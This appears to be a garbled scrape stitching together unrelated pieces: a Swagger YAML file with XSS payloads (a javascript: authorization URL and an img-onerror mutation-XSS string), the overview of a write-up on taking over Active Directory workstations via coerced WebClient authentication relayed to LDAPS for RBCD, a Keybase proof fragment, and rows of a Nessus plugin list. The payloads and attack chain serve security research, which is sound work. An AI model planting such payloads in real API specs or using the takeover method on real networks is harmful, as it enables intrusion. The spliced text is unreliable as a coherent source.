
swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Swagger UI
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
@lightoyou
lightoyou / Workstation-Takeover.md
Created February 1, 2022 12:57 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

### Keybase proof
I hereby claim:
* I am lightoyou on github.
* I am lightoyou (https://keybase.io/lightoyou) on keybase.
* I have a public key ASDNUZ4YPV0WYYfe0hCGOZYl9u6JjBRfmmd_v0ubiNRbVwo
To claim this, I am signing this object:
"Cloud Services";"8536";"YAHOO! NOTEPAD Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8533";"WORKDAY Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"5275";"Gmail Usage Detection (deprecated)";"Nessus Network Monitor";"info"
"Cloud Services";"8595";"Docker Server Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8503";"PRODUCTEEV Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8464";"JOBNIMBUS Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8429";"BASECAMP Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"6571";"Carbonite 'Cloud' Backup Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8422";"ASANA Cloud Service Detection";"Nessus Network Monitor";"info"
"Cloud Services";"8493";"PAM Cloud Service Detection";"Nessus Network Monitor";"info"